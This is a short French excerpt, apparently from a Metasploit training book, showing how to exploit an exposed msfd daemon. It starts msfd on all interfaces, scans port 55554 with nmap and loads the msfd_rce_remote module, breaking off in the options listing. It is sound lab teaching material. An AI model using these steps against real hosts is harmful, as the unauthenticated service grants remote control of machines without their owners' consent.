Exploitation de Metasploit par Metasploit Metasploit:exploitation par Metasploit

Chose promise, chose due ! Au chapitre Premiers pas avec Metasploit à la section Les interfaces, nous avons abordé Msfd et les problèmes de sécurité y étant liés. Msfd

Le lancement du service se fait de la manière suivante :

root@kali:~# msfd -a 0.0.0.0 
[*] Initializing msfd... 
[*] Running msfd... 

Sur la machine de l’attaquant, il est possible de vérifier la présence de ce port grâce à un scan de ports classique :

root@kali:~# nmap -p 55554 192.168.171.144 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-28 19:29 CET 
Nmap scan report for 192.168.171.144 
Host is up (0.000050s latency). 
 
PORT      STATE SERVICE 
55554/tcp open  unknown  
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds 

Dès lors, il est possible d’utiliser l’un des exploits précisés précédemment afin de prendre le contrôle de la machine distante grâce à l’absence d’authentification :

msf6 > use exploit/multi/misc/msfd_rce_remote 
msf6 exploit(multi/misc/msfd_rce_remote) >show options 
 
Module options (exploit/multi/misc/msfd_rce_remote): 
 
  Name    Current Setting  Required  Description 
  ----    ---------------  ...
EP2METAS_max.jpg

Découvrez 

le livre :

Aussi inclus dans nos :

Précédent
Préparation de la phase d’exploitation
Suivant
Exploitation de Metasploitable par Metasploit